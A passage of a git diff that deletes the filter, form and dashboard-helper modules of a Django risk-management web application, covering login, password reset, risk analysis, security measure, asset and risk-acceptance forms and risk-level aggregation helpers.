'name'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - } - ) - - class Meta: - model = Asset - fields = '__all__' - - -class UserFilter(GenericFilterSet): - - class Meta: - model = User - fields = ['email', 'first_name', 'last_name'] - - def user_search(queryset, name, value): - return queryset.filter( - Q(email__icontains=value) | Q( - first_name__icontains=value) | Q(last_name__icontains=value) - ).order_by('-is_active', '-is_superuser', 'email', 'id') - - YES_NO_CHOICES = ( - (True, _('Yes')), - (False, _('No')), - ) - - is_superuser = GenericChoiceFilter(choices=YES_NO_CHOICES, widget=Select( - attrs={ - 'class': 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 disabled:opacity-50' - })) - is_active = GenericChoiceFilter(choices=YES_NO_CHOICES, widget=Select( - attrs={ - 'class': 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 disabled:opacity-50' - })) - - user_groups = GenericModelMultipleChoiceFilter( - queryset=UserGroup.objects.all()) - - q = GenericCharFilter(method=user_search, label="Search", widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search user...') - })) - - orderby = GenericOrderingFilter( - fields=( - ('email', 'email'), - ('first_name', 'first_name'), - ('last_name', 'last_name'), - ('date_joined', 'date_joined') - ), - field_labels={ - 'email': _('Email'), - '-email': _('Email (descending)'), - 'first_name': _('First name'), - '-first_name': _('First name (descending)'), - 'last_name': _('Last name'), - '-last_name': _('Last name (descending)'), - 'date_joined': _('Created at'), - '-date_joined': _('Created at (descending)') - } - ) - - -class UserGroupFilter(GenericFilterSet): - - class Meta: - model = UserGroup - fields = '__all__' - - name = GenericCharFilter(widget=TextInput( - attrs={ - 'class': 'h-10 rounded-r-lg border-none focus:ring-0', - 'placeholder': _('Search user group...') - } - )) - - orderby = GenericOrderingFilter( - fields=( - ('name', 'name'), - ), - field_labels={ - 'name': _('name'.capitalize()), - '-name': _('Name (descending)'), - } - ) diff --git a/core/forms.py b/core/forms.py deleted file mode 100644 index 59607d4..0000000 --- a/core/forms.py +++ /dev/null @@ -1,487 +0,0 @@ -from typing import Optional, Sequence -from django.forms import CheckboxInput, DateInput, DateTimeInput, EmailInput, HiddenInput, ModelForm, NullBooleanSelect, NumberInput, PasswordInput, Select, SelectMultiple, TextInput, Textarea, TimeInput, URLInput, CheckboxSelectMultiple -from django.contrib.auth.forms import AuthenticationForm, SetPasswordForm -from django import forms -from .models import * -from iam.models import RoleAssignment -from django.utils.translation import gettext_lazy as _ -from django.utils.html import escape -from django.contrib.auth import get_user_model -from django.contrib.auth import authenticate -from django.contrib.auth.models import Permission -from mira.settings import RECAPTCHA_PUBLIC_KEY - -if RECAPTCHA_PUBLIC_KEY: - from captcha.fields import ReCaptchaField - from captcha.widgets import ReCaptchaV2Checkbox - -User = get_user_model() - -class LinkCleanMixin: - """ - Prevent code injection in link field - """ - def clean_link(self): - """ - Method to check if a link is valid - """ - link = self.cleaned_data.get('link') - if link: - link = escape(link) - if not link.startswith(('https://', 'ftps://')): - raise ValidationError(_('Invalid link')) - return link - -class SearchableCheckboxSelectMultiple(CheckboxSelectMultiple): - """ - A searchable checkbox select multiple widget. - - Widget attributes (in addition to the standard ones): - - wrapper_class: class for the wrapper div - - searchbar_class: class for the searchbar - """ - template_name = 'forms/widgets/select_multiple.html' - - -class SearchableSelect(Select): - template_name = 'forms/widgets/searchable_select.html' - option_template_name = 'forms/widgets/select_option.html' - - def __init__(self, *args, **kwargs) -> None: - super().__init__(*args, **kwargs) - self.id = f'searchable-select-{id(self)}' - -class DefaultDateInput(DateInput): - input_type = 'date' - - -class StyledModelForm(ModelForm): - def default_if_one(self, field_name): - field=self.fields[field_name] - if not hasattr(field, '_queryset'): - return - if field._queryset and len(field._queryset) == 1: - field.widget.attrs['disabled'] = True - field.widget.attrs['class'] += ' disabled:opacity-50' - field.initial = field.queryset[0] - - def default_if_one_all(self): - for fname, f in self.fields.items(): - self.default_if_one(fname) - - def __init__(self, *args, **kwargs): - super(__class__, self).__init__(*args, **kwargs) - text_inputs = (TextInput, NumberInput, EmailInput, URLInput, PasswordInput, HiddenInput, DefaultDateInput, DateInput, DateTimeInput, TimeInput) - select_inputs = (Select, SelectMultiple, NullBooleanSelect) - for fname, f in self.fields.items(): - input_type = f.widget.__class__ - if self.Meta.model: - model_name = str(self.Meta.model).split('.')[-1].strip("'>").lower() - if input_type in text_inputs: - f.widget.attrs['id'] = f'id_{model_name}_{fname}' if model_name else f'id_{fname}' - f.widget.attrs['class'] = 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5' - if input_type in select_inputs: - f.widget.attrs['id'] = f'id_{model_name}_{fname}' - f.widget.attrs['class'] = 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 disabled:opacity-50' - if input_type == Textarea: - f.widget.attrs['class'] = 'block p-2.5 w-full text-sm text-gray-900 bg-gray-50 rounded-lg border border-gray-300 focus:ring-blue-500 focus:border-blue-500' - if input_type == CheckboxInput: - f.widget.attrs['id'] = f'id_{model_name}_{fname}' - f.widget.attrs['class'] = 'w-4 h-4 text-blue-600 bg-gray-100 border-gray-300 rounded focus:ring-blue-500' - if input_type == DefaultDateInput: - f.widget.attrs['id'] = f'id_{model_name}_{fname}' - f.widget.attrs['class'] = 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5' - if input_type == Select: - self.default_if_one(fname) - -class LoginForm(AuthenticationForm): - username = forms.CharField(label=_("Email"), required=False, widget=forms.TextInput(attrs={'class': 'my-2 block w-full rounded-md border-gray-300 shadow-sm focus:border-indigo-300 focus:ring focus:ring-indigo-200 focus:ring-opacity-50'})) - password = forms.CharField(label=_("Password"), required=False, widget=forms.PasswordInput(attrs={'class': 'my-2 block w-full rounded-md border-gray-300 shadow-sm focus:border-indigo-300 focus:ring focus:ring-indigo-200 focus:ring-opacity-50'})) - - def clean(self): - username = self.cleaned_data.get('username').lower() - password = self.cleaned_data.get('password') - passkey = self.request.POST.get('passkeys') - if (username and password) or passkey: - self.user_cache = authenticate(self.request, username=username, password=password) - if self.user_cache is None: - print("Authentication failed") - raise forms.ValidationError( - self.error_messages['invalid_login'], - code='invalid_login', - params={'username': self.username_field.verbose_name}, - ) - else: - self.confirm_login_allowed(self.user_cache) - print("Authentication succeeded for ", self.user_cache) - else: - raise forms.ValidationError( - self.error_messages['invalid_login'], - code='invalid_login', - params={'username': self.username_field.verbose_name}, - ) - return self.cleaned_data - -class ResetForm(forms.Form): - email = forms.EmailField(label=_("Email"), widget=forms.TextInput(attrs={'class': 'my-2 block w-full rounded-md border-gray-300 shadow-sm focus:border-indigo-300 focus:ring focus:ring-indigo-200 focus:ring-opacity-50'})) - if RECAPTCHA_PUBLIC_KEY: - captcha = ReCaptchaField(widget=ReCaptchaV2Checkbox) - - -class ResetConfirmForm(SetPasswordForm): - def __init__(self, *args, **kwargs): - style = 'my-2 block w-full rounded-md border-gray-300 shadow-sm focus:border-indigo-300 focus:ring focus:ring-indigo-200 focus:ring-opacity-50' - super(__class__, self).__init__(*args, **kwargs) - for password in self.fields.items(): - password[1].widget.attrs['class'] = style - -class FirstConnexionConfirmForm(SetPasswordForm): - def __init__(self, *args, **kwargs): - style = 'my-2 block w-full rounded-md border-gray-300 shadow-sm focus:border-indigo-300 focus:ring focus:ring-indigo-200 focus:ring-opacity-50' - super(__class__, self).__init__(*args, **kwargs) - for password in self.fields.items(): - password[1].widget.attrs['class'] = style - self.fields['terms_service'].widget.attrs['class'] = 'ml-2 rounded border-gray-300 shadow-sm focus:border-indigo-600 focus:ring focus:ring-indigo-500 focus:ring-opacity-50 text-indigo-500' - self.fields['terms_service'].widget.attrs['id'] = 'terms_service' - - terms_service = forms.BooleanField(label=_("terms and conditions of use")) - -class RiskAnalysisCreateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['rating_matrix'].queryset = RiskMatrix.objects.filter(is_enabled=True) - self.fields['rating_matrix'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['rating_matrix'].choices) - self.fields['project'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['project'].choices) - self.default_if_one_all() - - class Meta: - model = Analysis - fields = ['project', 'name', 'description', 'auditor', 'is_draft', 'rating_matrix', 'version'] - -class RiskAnalysisCreateFormInherited(StyledModelForm): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['project'].widget.attrs['disabled'] = True - self.fields['rating_matrix'].queryset = RiskMatrix.objects.filter(is_enabled=True) - self.fields['rating_matrix'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['rating_matrix'].choices) - self.default_if_one_all() - - class Meta: - model = Analysis - fields = ['project', 'name', 'description', 'auditor', 'is_draft', 'rating_matrix', 'version'] - - -class RiskMatrixUpdateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.default_if_one_all() - - class Meta: - model = RiskMatrix - fields = ['is_enabled'] - - -class RiskAnalysisUpdateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['project'].widget.attrs['disabled'] = True - self.fields['project'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['project'].choices) - self.fields['auditor'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['auditor'].choices) - - class Meta: - model = Analysis - fields = ['project', 'auditor', 'name', 'description', 'version', 'is_draft'] - - -class SecurityMeasureCreateForm(LinkCleanMixin, StyledModelForm): - folder = forms.ModelChoiceField(queryset=Folder.objects.filter(content_type=Folder.ContentType.DOMAIN)) - def __init__(self, user=None, *args, **kwargs): - super().__init__(*args, **kwargs) - if user: - self.fields['folder'].queryset = Folder.objects.filter(id__in=RoleAssignment.get_accessible_folders(Folder.get_root_folder(), user, Folder.ContentType.DOMAIN, codename="add_securitymeasure")) - self.fields['folder'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['folder'].choices) - self.fields['security_function'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['security_function'].choices) - - class Meta: - model = SecurityMeasure - fields = '__all__' - widgets = { - 'eta': DefaultDateInput() - } - -class SecurityMeasureCreateFormInherited(LinkCleanMixin, StyledModelForm): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['folder'].queryset = Folder.objects.filter(content_type=Folder.ContentType.DOMAIN) - self.fields['folder'].widget.attrs['disabled'] = True - self.fields['security_function'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['security_function'].choices) - - class Meta: - model = SecurityMeasure - fields = '__all__' - widgets = { - 'eta': DefaultDateInput() - } - - -class SecurityMeasureUpdateForm(LinkCleanMixin, StyledModelForm): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['folder'].queryset = Folder.objects.filter(content_type=Folder.ContentType.DOMAIN) - self.fields['folder'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['folder'].choices) - self.fields['security_function'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['security_function'].choices) - - class Meta: - model = SecurityMeasure - fields = '__all__' - widgets = { - 'eta': DefaultDateInput(format='%Y-%m-%d') - } - -class RiskScenarioCreateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['threat'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['threat'].choices) - - class Meta: - model = RiskScenario - fields = ['analysis', 'threat', 'name', 'description'] - - -class RiskScenarioUpdateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - PROBA_CHOICES = [(-1, '--')] + list(zip(list(range(0, 10)), [x['name'] for x in self.instance.get_matrix()['probability']])) - IMPACT_CHOICES = [(-1, '--')] + list(zip(list(range(0, 10)), [x['name'] for x in self.instance.get_matrix()['impact']])) - self.fields['current_proba'].widget = Select(choices=PROBA_CHOICES, attrs={ - 'class': 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 disabled:opacity-50', - 'onchange': 'refresh();' - }) - self.fields['current_impact'].widget = Select(choices=IMPACT_CHOICES, attrs={ - 'class': 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 disabled:opacity-50', - 'onchange': 'refresh();' - }) - self.fields['residual_proba'].widget = Select(choices=PROBA_CHOICES, attrs={ - 'class': 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 disabled:opacity-50', - 'onchange': 'refresh();' - }) - self.fields['residual_impact'].widget = Select(choices=IMPACT_CHOICES, attrs={ - 'class': 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5 disabled:opacity-50', - 'onchange': 'refresh();' - }) - self.fields['assets'].widget = SearchableCheckboxSelectMultiple(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm border border-gray-300 rounded-t-lg px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 py-2 px-4 overflow-y-scroll h-80'}, - choices=self.fields['assets'].choices) - self.fields['threat'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['threat'].choices) - self.fields['analysis'].widget = SearchableSelect(attrs={'class': 'text-sm rounded w-64', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll', - 'id': 'analysis_select'}, - choices=self.fields['analysis'].choices) - - class Meta: - model = RiskScenario - fields = '__all__' - exclude = ['current_level', 'residual_level'] - - -class SecurityMeasureSelectForm(StyledModelForm): - - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['security_measures'].widget = SearchableCheckboxSelectMultiple(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm border border-gray-300 rounded-t-lg px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 py-2 px-4 max-h-56 overflow-y-scroll'}, - choices=self.fields['security_measures'].choices) - - class Meta: - model = RiskScenario - fields = ['security_measures'] - - -class RiskScenarioModalUpdateForm(StyledModelForm): - class Meta: - model = RiskScenario - fields = '__all__' - - -class RiskAcceptanceCreateUpdateForm(StyledModelForm): - def __init__(self, user=None, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['risk_scenarios'].widget = SearchableCheckboxSelectMultiple(attrs={'id': 'id_riskscenarios_select', 'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm border border-gray-300 rounded-t-lg px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 py-2 px-4 max-h-56 overflow-y-scroll'}, - choices=self.fields['risk_scenarios'].choices) - validators_id = [] - for candidate in User.objects.all(): - if RoleAssignment.has_permission(candidate, 'validate_riskacceptance'): - validators_id.append(candidate.id) - self.fields['validator'].queryset = User.objects.filter(id__in=validators_id) - if user: - self.fields['folder'].queryset = Folder.objects.filter(id__in=RoleAssignment.get_accessible_folders(Folder.get_root_folder(), user, None, codename="add_riskacceptance")) - # else: - # self.fields['folder'].queryset = Folder.objects.filter(content_type=Folder.ContentType.DOMAIN) - # Else statement causes a problem because during submition for global folder - # Folder.objects.filter(content_type=Folder.ContentType.DOMAIN) doesn't content global so an error occured - - class Meta: - model = RiskAcceptance - fields = '__all__' - widgets = { - 'expiry_date': DefaultDateInput(format='%Y-%m-%d'), - } - labels = {'risk_scenario': _('Risk scenario')} - exclude = ['state', 'accepted_date', 'rejected_date', 'revoked_date'] - - def clean(self): - cleaned_data = super().clean() - risk_scenarios = cleaned_data.get('risk_scenarios') - folder = cleaned_data.get('folder') - validator = cleaned_data.get('validator') - - folders = folder.sub_folders() - folders.append(folder) - if validator: - if not RoleAssignment.is_access_allowed(validator, Permission.objects.get(codename='validate_riskacceptance'), folder): - raise ValidationError(_("This validator cannot be assigned for this domain")) - if risk_scenarios: - for obj in risk_scenarios: - if obj.analysis.project.folder not in folders: - raise ValidationError(_("Checked risk scenarios must be part of the selected domain")) - - -class ProjectForm(StyledModelForm): - folder = forms.ModelChoiceField(queryset=Folder.objects.filter(content_type=Folder.ContentType.DOMAIN)) - def __init__(self, user=None, *args, **kwargs): - super(ProjectForm, self).__init__(*args, **kwargs) - if user: - self.fields['folder'].queryset = Folder.objects.filter(id__in=RoleAssignment.get_accessible_folders(Folder.get_root_folder(), user, Folder.ContentType.DOMAIN, codename="add_project")) - self.fields['folder'].widget = SearchableSelect(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 max-h-56 overflow-y-scroll'}, - choices=self.fields['folder'].choices) - - - class Meta: - model = Project - fields = '__all__' - labels = {'folder': _('Domain')} - -class ProjectFormInherited(StyledModelForm): - def __init__(self, *args, **kwargs): - super(ProjectFormInherited, self).__init__(*args, **kwargs) - self.fields['folder'].queryset = Folder.objects.filter(content_type=Folder.ContentType.DOMAIN) - self.fields['folder'].widget.attrs['disabled'] = True - - class Meta: - model = Project - fields = '__all__' - labels = {'folder': _('Domain')} - - -class ThreatCreateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super(ThreatCreateForm, self).__init__(*args, **kwargs) - - - class Meta: - model = Threat - fields = '__all__' - exclude = ['is_published', 'folder'] - - -class ThreatUpdateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super(ThreatUpdateForm, self).__init__(*args, **kwargs) - - class Meta: - model = Threat - fields = '__all__' - exclude = ['is_published', 'folder'] - - -class AssetForm(StyledModelForm): - def __init__(self, *args, user=None, **kwargs): - super(AssetForm, self).__init__(*args, **kwargs) - self.fields['parent_assets'].widget = SearchableCheckboxSelectMultiple(attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm border border-gray-300 rounded-t-lg px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 py-2 px-4 max-h-56 overflow-y-scroll'}, - choices=self.fields['parent_assets'].choices) - viewable_assets = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, Asset)[0] if user else Asset.objects.none() - self.fields['parent_assets'].queryset = Asset.objects.filter(id__in=viewable_assets - ).exclude(id=self.instance.id) if self.instance else Asset.objects.filter(id__in=viewable_assets) - - def clean(self): - """ check the AssetForm values before submission to the model. This is required as we used manytomany """ - cleaned_data = super().clean() - parent_assets = cleaned_data.get('parent_assets') - asset_type = cleaned_data.get('type') - if asset_type == Asset.Type.PRIMARY and parent_assets.exists(): - raise ValidationError(_('A primary asset cannot have parent assets.')) - # if we are in an update form, let's check there are no cycles - if self.instance: - for parent in parent_assets.all(): - if self.instance in parent.ancestors_plus_self(): - raise ValidationError(_('Cycles are not allowed.')) - return cleaned_data - - class Meta: - model = Asset - exclude = ['is_published', 'folder'] - - -class SecurityFunctionCreateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super(SecurityFunctionCreateForm, self).__init__(*args, **kwargs) - - class Meta: - model = SecurityFunction - fields = '__all__' - exclude = ['is_published', 'folder'] - - -class SecurityFunctionUpdateForm(StyledModelForm): - def __init__(self, *args, **kwargs): - super(SecurityFunctionUpdateForm, self).__init__(*args, **kwargs) - class Meta: - model = SecurityFunction - fields = '__all__' - exclude = ['is_published', 'folder'] diff --git a/core/helpers.py b/core/helpers.py deleted file mode 100644 index 1b558ce..0000000 --- a/core/helpers.py +++ /dev/null @@ -1,409 +0,0 @@ -from datetime import timedelta -import logging -from .models import * -from iam.models import Folder, RoleAssignment, User -from django.db.models import Count -from collections import Counter - -STATUS_COLOR_MAP = {'open': '#fac858', 'mitigated': '#91cc75', 'accepted': '#73c0de', 'blocker': '#ee6666', 'in_progress': '#5470c6', - 'on_hold': '#ee6666', 'done': '#91cc75', 'transferred': '#91cc75'} - - -def get_parsed_matrices(user: User, analyses: list = None): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, RiskScenario) - risk_matrices = list() - if analyses is None: - risk_matrices= RiskScenario.objects.filter(id__in=object_ids_view).values_list( - 'analysis__rating_matrix__json_definition', flat=True).distinct() - else: - risk_matrices = RiskScenario.objects.filter(id__in=object_ids_view).filter(analysis__in=analyses).values_list( - 'analysis__rating_matrix__json_definition', flat=True).distinct() - parsed_matrices: list = [json.loads(m) for m in risk_matrices] - return sorted(parsed_matrices, key=lambda m: len(m['risk']), reverse=True) - - -def get_risk_field(user: User, field: str): - """ - Returns a list of the field values of all risks in all matrices - """ - parsed_matrices = get_parsed_matrices(user) - return [m['risk'][i][field] for m in parsed_matrices for i in range(len(m['risk']))] - - -def get_risk_color_map(user: User): - """ - Returns a dictionary with the risk abbreviations as keys and its hex color as value - """ - risk_abbreviations: list = get_risk_field(user, 'abbreviation') - risk_colors: list = get_risk_field(user, 'hexcolor') - return dict(zip(risk_abbreviations, risk_colors)) - - -def get_risk_color_map_name(user: User): - """ - Returns a dictionary with the risk names as keys and its hex color as value - """ - risk_names: list = get_risk_field(user, 'name') - risk_colors: list = get_risk_field(user, 'hexcolor') - return dict(zip(risk_names, risk_colors)) - - -def get_risk_color_ordered_list(user: User, analyses_list: list=None): - """ - Returns a list of hex colors ordered by matrix and risk - """ - risk_colors = list() - encountered_risks = set() - parsed_matrices = get_parsed_matrices(user, analyses_list) - for m in parsed_matrices: - for i in range(len(m['risk'])): - if m['risk'][i]['name'] in encountered_risks: - continue - risk_colors.append(m['risk'][i]['hexcolor']) - encountered_risks.add(m['risk'][i]['name']) - return risk_colors - - -def get_rating_options(user: User) -> list: - risk_labels: list = get_risk_field(user, 'name') - return [(i, l) for i, l in enumerate(risk_labels)] - - -def get_rating_options_abbr(user: User): - risk_abbreviations: list = get_risk_field(user, 'abbreviation') - risk_names: list = get_risk_field(user, 'name') - return list(zip(risk_abbreviations, risk_names)) - - -def get_rating_options_parsed_matrix(user: User, parsed_matrix): - risk_names: list = [f"{parsed_matrix['risk'][i]['name']}" for i in range( - len(parsed_matrix['risk']))] - return [(i, l) for i, l in enumerate(risk_names)] - - -def risk_per_status(user: User): - # NOTE: if we want to skip empty values, we could just use the user_group by using annotation - # rs_groups = - # RiskScenario.objects.all().values('treatment').annotate(total=Count('treatment')).order_by('treatment') - - labels = list() - values = list() - # Pal ['#5470c6', '#91cc75', '#fac858', '#ee6666', '#73c0de', '#3ba272', '#fc8452', '#9a60b4', '#ea7ccc'] - # - - # this formatting is a constraint from eCharts - color_map = {"open": "#fac858", "mitigated": "#91cc75", - "accepted": "#73c0de", "blocker": "#ee6666", "transferred": "#91cc75"} - - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, RiskScenario) - for st in RiskScenario.TREATMENT_OPTIONS: - count = RiskScenario.objects.filter( - id__in=object_ids_view).filter(treatment=st[0]).count() - v = { - "value": count, - "itemStyle": {"color": color_map[st[0]]} - } - values.append(v) - labels.append(st[1]) - - return {"labels": labels, "values": values} - - -def security_measure_per_status(user: User): - values = list() - labels = list() - color_map = {"open": "#93c5fd", "in_progress": "#fdba74", - "on_hold": "#f87171", "done": "#86efac"} - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, SecurityMeasure) - for st in SecurityMeasure.MITIGATION_STATUS: - count = SecurityMeasure.objects.filter( - id__in=object_ids_view).filter(status=st[0]).count() - v = { - "value": count, - "itemStyle": {"color": color_map[st[0]]} - } - values.append(v) - labels.append(st[1]) - return {"labels": labels, "values": values} - - -def security_measure_per_cur_risk(user: User): - output = list() - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, SecurityMeasure) - for lvl in get_rating_options(user): - cnt = SecurityMeasure.objects.filter(id__in=object_ids_view).exclude( - status='done').filter(riskscenario__current_level=lvl[0]).count() - output.append({"name": lvl[1], "value": cnt}) - - return {"values": output} - - -def security_measure_per_security_function(user: User): - indicators = list() - values = list() - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, SecurityMeasure) - - tmp = SecurityMeasure.objects.filter(id__in=object_ids_view).values( - 'security_function__name').annotate(total=Count('security_function')).order_by('security_function') - for entry in tmp: - indicators.append(entry['security_function__name']) - values.append(entry['total']) - - return {"indicators": indicators, "values": values, "min": min(values, default=0) - 1, "max": max(values, default=0) + 1} - - -def aggregate_risks_per_field(user: User, field: str, residual: bool = False, analyses: list = None): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, RiskScenario) - parsed_matrices: list = get_parsed_matrices(user=user, analyses=analyses) - values = dict() - for m in parsed_matrices: - for i in range(len(m['risk'])): - if m['risk'][i][field] not in values: - values[m['risk'][i][field]] = dict() - - if residual: - count = RiskScenario.objects.filter(id__in=object_ids_view).filter( - residual_level=i).filter(analysis__rating_matrix__name=m['name']).count() - else: - count = RiskScenario.objects.filter(id__in=object_ids_view).filter( - current_level=i).filter(analysis__rating_matrix__name=m['name']).count() - - if 'count' not in values[m['risk'][i][field]]: - values[m['risk'][i][field]]['count'] = count - values[m['risk'][i][field]]['color'] = m['risk'][i]['hexcolor'] - continue - values[m['risk'][i][field]]['count'] += count - return values - - -def risks_count_per_level(user: User, analyses: list = None): - current_level = list() - residual_level = list() - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, RiskScenario) - - for r in aggregate_risks_per_field(user, 'name', analyses=analyses).items(): - current_level.append({'name': r[0], 'value': r[1]['count'], 'color': r[1]['color']}) - - for r in aggregate_risks_per_field(user, 'name', residual=True, 